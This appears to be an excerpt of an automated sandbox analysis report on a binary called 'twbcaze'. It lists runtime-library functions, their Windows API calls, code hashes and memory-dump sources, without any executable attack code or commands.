                                          • Opcode ID: ca4cc948e7cac62821100280396542b5b8790cd7ca5c2616e5165290a72708b7
                                          • Instruction ID: 10d55a3d9dcdfbb2ee4bf10709a2db1c01cb4fc842f04bee9b6b8bffb745b34f
                                          • Opcode Fuzzy Hash: ca4cc948e7cac62821100280396542b5b8790cd7ca5c2616e5165290a72708b7
                                          • Instruction Fuzzy Hash: 0121B672611306ABDB289A25DC41AFB77A8EF04318F10407FFD06D6252E738AD86C759
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0041AE68: GetLastError.KERNEL32(?,00000004,00000008,0041CF9A), ref: 0041AE6D
                                            • Part of subcall function 0041AE68: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 0041AF0B
                                          • EnumSystemLocalesW.KERNEL32(0041FAC4,00000001,00000000,?,-00000050,?,0041F8B3,00000000,-00000002,00000000,?,00000055,?), ref: 0041FA9B
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2417226690-0
                                          • Opcode ID: 24d9f12c9ff9318025bbd53b0fa2a750c21dd6420c05e1eb61f8585562132174
                                          • Instruction ID: 33417a5631a89835e57847a0522a29cad8df5ea76d98ba4df800e8099a0f39a2
                                          • Opcode Fuzzy Hash: 24d9f12c9ff9318025bbd53b0fa2a750c21dd6420c05e1eb61f8585562132174
                                          • Instruction Fuzzy Hash: 5111C63B2007015FDB18AF39C8916BAB792FF84358B58443EE98A47B40D379B947C744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0041AE68: GetLastError.KERNEL32(?,00000004,00000008,0041CF9A), ref: 0041AE6D
                                            • Part of subcall function 0041AE68: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 0041AF0B
                                            • Part of subcall function 0041AE68: _free.LIBCMT ref: 0041AECA
                                            • Part of subcall function 0041AE68: _free.LIBCMT ref: 0041AF00
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041FEEA
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast_free$InfoLocale
                                          • String ID:
                                          • API String ID: 2003897158-0
                                          • Opcode ID: 073bf57e617ead7743a03dbd9fae7aa9d6ccc20203289cd0083fcc093794edca
                                          • Instruction ID: d06322da41f1ea895bfa6be50a63a5708ed325d3cac85478186cb447edbad442
                                          • Opcode Fuzzy Hash: 073bf57e617ead7743a03dbd9fae7aa9d6ccc20203289cd0083fcc093794edca
                                          • Instruction Fuzzy Hash: AF11C672601216ABDB14AB65DC42AFA73E8EF09314B10407FF901D7241EBBCED86C758
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0041AE68: GetLastError.KERNEL32(?,00000004,00000008,0041CF9A), ref: 0041AE6D
                                            • Part of subcall function 0041AE68: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 0041AF0B
                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0041FCE0,00000000,00000000,?), ref: 0042006F
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$InfoLocale
                                          • String ID:
                                          • API String ID: 3736152602-0
                                          • Opcode ID: 18fdc5c88f8a52bb8aa12cdd676a1fb474123b5ac98d72e7010630e7c620e3f3
                                          • Instruction ID: c67510dd7e706448ece52ebd5ecb31bc795c76781afd46c53c550107c917c88e
                                          • Opcode Fuzzy Hash: 18fdc5c88f8a52bb8aa12cdd676a1fb474123b5ac98d72e7010630e7c620e3f3
                                          • Instruction Fuzzy Hash: 66F0F9327001216BEB285665A805BBB77E4EB40754F44442AED46A3242EA38FD41C694
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0041AE68: GetLastError.KERNEL32(?,00000004,00000008,0041CF9A), ref: 0041AE6D
                                            • Part of subcall function 0041AE68: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 0041AF0B
                                          • EnumSystemLocalesW.KERNEL32(0041FD76,00000001,?,?,-00000050,?,0041F877,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 0041FD61
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2417226690-0
                                          • Opcode ID: 6ae71a939a11522df4327ded550d35403f0a03c9b9b2aeabd82d0e6ff0f994b9
                                          • Instruction ID: a5256b6c35e63d2cb6e3f0b65d5a0dd39432498f0cacc1524f5fae9b2dc4f453
                                          • Opcode Fuzzy Hash: 6ae71a939a11522df4327ded550d35403f0a03c9b9b2aeabd82d0e6ff0f994b9
                                          • Instruction Fuzzy Hash: FDF046763007041FCB246F39A881ABA7B91EF8036CF15853EFA464B690D3B9AC83C704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00415904: EnterCriticalSection.KERNEL32(?,?,004134D6,00000000,0042F7D0,0000000C,0041348E,00000000,?,0041BD76,00000000,?,0041B00A,00000001,00000364,00000005), ref: 00415913
                                          • EnumSystemLocalesW.KERNEL32(0041BC85,00000001,0042FA90,0000000C,0041B69D,-00000050), ref: 0041BCCA
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                          • String ID:
                                          • API String ID: 1272433827-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0041AE68: GetLastError.KERNEL32(?,00000004,00000008,0041CF9A), ref: 0041AE6D
                                            • Part of subcall function 0041AE68: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 0041AF0B
                                          • EnumSystemLocalesW.KERNEL32(0041FE96,00000001,?,?,?,0041F8D5,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 0041FE82
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2417226690-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00414A3E,?,20001004,00000000,00000002,?,?,0041394F), ref: 0041B7D5
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HeapProcess
                                          • String ID:
                                          • API String ID: 54951025-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_230000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_230000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_230000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_230000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$Info
                                          • String ID: xxB
                                          • API String ID: 2509303402-3667342264
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 0041EC84
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E0B9
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E0CB
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E0DD
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E0EF
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E101
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E113
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E125
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E137
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E149
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E15B
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E16D
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E17F
                                            • Part of subcall function 0041E09C: _free.LIBCMT ref: 0041E191
                                          • _free.LIBCMT ref: 0041EC79
                                            • Part of subcall function 0041AC67: HeapFree.KERNEL32(00000000,00000000), ref: 0041AC7D
                                            • Part of subcall function 0041AC67: GetLastError.KERNEL32(?,?,0041E816,?,00000000,?,?,?,0041E4A5,?,00000007,?,?,0041EE00,?,?), ref: 0041AC8F
                                          • _free.LIBCMT ref: 0041EC9B
                                          • _free.LIBCMT ref: 0041ECB0
                                          • _free.LIBCMT ref: 0041ECBB
                                          • _free.LIBCMT ref: 0041ECDD
                                          • _free.LIBCMT ref: 0041ECF0
                                          • _free.LIBCMT ref: 0041ECFE
                                          • _free.LIBCMT ref: 0041ED09
                                          • _free.LIBCMT ref: 0041ED41
                                          • _free.LIBCMT ref: 0041ED48
                                          • _free.LIBCMT ref: 0041ED65
                                          • _free.LIBCMT ref: 0041ED7D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _free.LIBCMT ref: 0041B18F
                                            • Part of subcall function 0041AC67: HeapFree.KERNEL32(00000000,00000000), ref: 0041AC7D
                                            • Part of subcall function 0041AC67: GetLastError.KERNEL32(?,?,0041E816,?,00000000,?,?,?,0041E4A5,?,00000007,?,?,0041EE00,?,?), ref: 0041AC8F
                                          • _free.LIBCMT ref: 0041B19B
                                          • _free.LIBCMT ref: 0041B1A6
                                          • _free.LIBCMT ref: 0041B1B1
                                          • _free.LIBCMT ref: 0041B1BC
                                          • _free.LIBCMT ref: 0041B1C7
                                          • _free.LIBCMT ref: 0041B1D2
                                          • _free.LIBCMT ref: 0041B1DD
                                          • _free.LIBCMT ref: 0041B1E8
                                          • _free.LIBCMT ref: 0041B1F6
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • type_info::operator==.LIBVCRUNTIME ref: 0041A416
                                          • CatchIt.LIBVCRUNTIME ref: 0041A575
                                          • _UnwindNestedFrames.LIBCMT ref: 0041A676
                                          • CallUnexpected.LIBVCRUNTIME ref: 0041A691
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CallCatchFramesNestedUnexpectedUnwindtype_info::operator==
                                          • String ID: csm$csm$csm$hlB
                                          • API String ID: 2332921423-3326005231
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0040FADB
                                          • __alloca_probe_16.LIBCMT ref: 0040FB07
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000,?,?,?,?,?,?,004047EE), ref: 0040FB46
                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,004047EE), ref: 0040FB63
                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,004047EE), ref: 0040FBA2
                                          • __alloca_probe_16.LIBCMT ref: 0040FBBF
                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,004047EE), ref: 0040FC01
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,?,?,?,?,?,004047EE), ref: 0040FC24
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                          • String ID:
                                          • API String ID: 2040435927-0
                                          • Opcode ID: c7f0382c200de1288c457e93c00c638dbe007d1ecd4d41b60b9608ac7cb25e35
                                          • Instruction ID: e1417c7bff74048c17493f3a773e66c8f2280b5088370d863b7d16ceba90c4e7
                                          • Opcode Fuzzy Hash: c7f0382c200de1288c457e93c00c638dbe007d1ecd4d41b60b9608ac7cb25e35
                                          • Instruction Fuzzy Hash: 23517F7261020AABEB309F51CC46FAB7BB9EF44754F14403ABD05F6690D738AC59CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 00410A97
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00410A9F
                                          • _ValidateLocalCookies.LIBCMT ref: 00410B28
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00410B53
                                          • _ValidateLocalCookies.LIBCMT ref: 00410BA8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1170836740-1018135373
                                          • Opcode ID: 143a747af0ca9d0d0b1de1a2e253aee19515e48f7ac29c3e463687d02ec2b84a
                                          • Instruction ID: 9e609370faf7bb1396030742b487c5011d168dbd24c681577ab23c87187feb3b
                                          • Opcode Fuzzy Hash: 143a747af0ca9d0d0b1de1a2e253aee19515e48f7ac29c3e463687d02ec2b84a
                                          • Instruction Fuzzy Hash: 5841C630A052189BCF10EF69C844ADEBBB1AF4432CF14815AF8155B352D779A9D1CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0041E7EC: _free.LIBCMT ref: 0041E811
                                          • _free.LIBCMT ref: 0041E4DA
                                            • Part of subcall function 0041AC67: HeapFree.KERNEL32(00000000,00000000), ref: 0041AC7D
                                            • Part of subcall function 0041AC67: GetLastError.KERNEL32(?,?,0041E816,?,00000000,?,?,?,0041E4A5,?,00000007,?,?,0041EE00,?,?), ref: 0041AC8F
                                          • _free.LIBCMT ref: 0041E4E5
                                          • _free.LIBCMT ref: 0041E4F0
                                          • _free.LIBCMT ref: 0041E544
                                          • _free.LIBCMT ref: 0041E54F
                                          • _free.LIBCMT ref: 0041E55A
                                          • _free.LIBCMT ref: 0041E565
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 4fa3af1e4e2541f5a962136ba2ef0094dd114dc65fa6a56b2720c2e6f46b313b
                                          • Instruction ID: 284df9f1b7a7b18ebc2636481bb3a9bc6959072237368f804615af593e33ab9b
                                          • Opcode Fuzzy Hash: 4fa3af1e4e2541f5a962136ba2ef0094dd114dc65fa6a56b2720c2e6f46b313b
                                          • Instruction Fuzzy Hash: 5211AF39601B44ABE520F7B3DC4BFCBB79C5F00304F400C1EB6ED66192EA78B5944685
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetConsoleOutputCP.KERNEL32 ref: 00422A41
                                          • __fassign.LIBCMT ref: 00422C26
                                          • __fassign.LIBCMT ref: 00422C43
                                          • WriteFile.KERNEL32(?,0041D2F5,00000000,?,00000000), ref: 00422C8B
                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00422CCB
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00422D73
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                          • String ID:
                                          • API String ID: 1735259414-0
                                          • Opcode ID: 6eadf0ef7b1578d9249ff99873997d0fd24100ea5cf61461da0c2fdd33d9f9ca
                                          • Instruction ID: dea6e254ba90a19633800a2bb2561a710fdd656b41b0a75608fd30b53b49681c
                                          • Opcode Fuzzy Hash: 6eadf0ef7b1578d9249ff99873997d0fd24100ea5cf61461da0c2fdd33d9f9ca
                                          • Instruction Fuzzy Hash: D4C1A071E002689FCF15CFA9D9809EDBBB5BF08304F28416AE815F7341D679A946CF68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __cftoe$_free
                                          • String ID:
                                          • API String ID: 1303422935-0
                                          • Opcode ID: a1eef01c508509c2d1d122460e36017c013dda3dbbad62265d6f8bf9cdd3332f
                                          • Instruction ID: ac7b474d6fc98c5ebbd15da6fc75ba26e624e1edeebb7e1b3e46e77a32f7513f
                                          • Opcode Fuzzy Hash: a1eef01c508509c2d1d122460e36017c013dda3dbbad62265d6f8bf9cdd3332f
                                          • Instruction Fuzzy Hash: A671C232600605EFDB24DB6DD881AEA77E5EF88324B24052FF419D7391DB35ED908B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32(?,?,00419A27,00410832,0040F868), ref: 00419A3E
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00419A4C
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00419A65
                                          • SetLastError.KERNEL32(00000000,00419A27,00410832,0040F868), ref: 00419AB7
                                          Memory Dump Source
